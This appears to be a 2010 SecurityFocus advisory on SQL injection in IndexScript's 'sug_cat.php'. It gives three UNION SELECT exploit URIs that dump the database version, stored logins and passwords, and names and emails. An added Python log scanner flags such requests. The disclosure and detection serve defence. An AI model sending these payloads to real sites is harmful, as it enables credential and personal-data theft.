IndexScript 'sug_cat.php' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URIs are available:

http://www.example.com/sug_cat.php?parent_id=-1 UNION SELECT concat_ws(0x3a,version(),database(),user())--

http://www.example.com/sug_cat.php?parent_id=-1 UNION ALL SELECT login,password FROM dir_login--

http://www.example.com/sug_cat.php?parent_id=-1 UNION ALL SELECT name,email FROM dir_pend_cat--
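A defender-side check for the pattern in these URIs, added here as an example and not part of the original advisory: it scans access-log lines for 'sug_cat.php' requests whose parent_id is not a plain integer. The log lines, addresses and timestamps are constructed, and treating parent_id as an integer-only parameter is an assumption about the application.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Request line of a combined-format access log entry: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>.+?) HTTP/\d(?:\.\d)?"')
INTEGER_RE = re.compile(r"-?\d+")  # assumption: parent_id is a numeric category id

# Constructed sample log lines (documentation addresses, made-up timestamps and sizes).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2010:10:00:00 +0000] "GET /sug_cat.php?parent_id=4 HTTP/1.1" 200 512',
    '192.0.2.77 - - [01/Jan/2010:10:00:05 +0000] "GET /sug_cat.php?parent_id=-1%20UNION%20ALL%20SELECT%20login,password%20FROM%20dir_login-- HTTP/1.1" 200 2048',
    '192.0.2.77 - - [01/Jan/2010:10:00:09 +0000] "GET /sug_cat.php?parent_id=-1+UNION+ALL+SELECT+name,email+FROM+dir_pend_cat-- HTTP/1.1" 200 1734',
    '192.0.2.10 - - [01/Jan/2010:10:00:12 +0000] "GET /index.php?parent_id=abc HTTP/1.1" 200 300',
]


def suspicious_parent_id(log_line):
    """Return the decoded parent_id if a sug_cat.php request carries a non-integer value."""
    match = REQUEST_RE.search(log_line)
    if match is None:
        return None
    parts = urlsplit(match.group("target"))
    if not parts.path.endswith("/sug_cat.php"):
        return None
    # parse_qs percent-decodes each value and turns '+' into a space.
    values = parse_qs(parts.query, keep_blank_values=True).get("parent_id", [])
    for value in values:
        if INTEGER_RE.fullmatch(value.strip()) is None:
            return value
    return None


def scan(lines):
    """Return (client_ip, decoded_value) for every flagged request."""
    hits = []
    for line in lines:
        value = suspicious_parent_id(line)
        if value is not None:
            hits.append((line.split(" ", 1)[0], value))
    return hits


if __name__ == "__main__":
    for ip, value in scan(SAMPLE_LOG):
        print(f"{ip}  parent_id={value!r}")
```

The same integer-only rule, enforced in the application before the value reaches the SQL statement, rejects all three example URIs above.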


 

Copyright 2010, SecurityFocus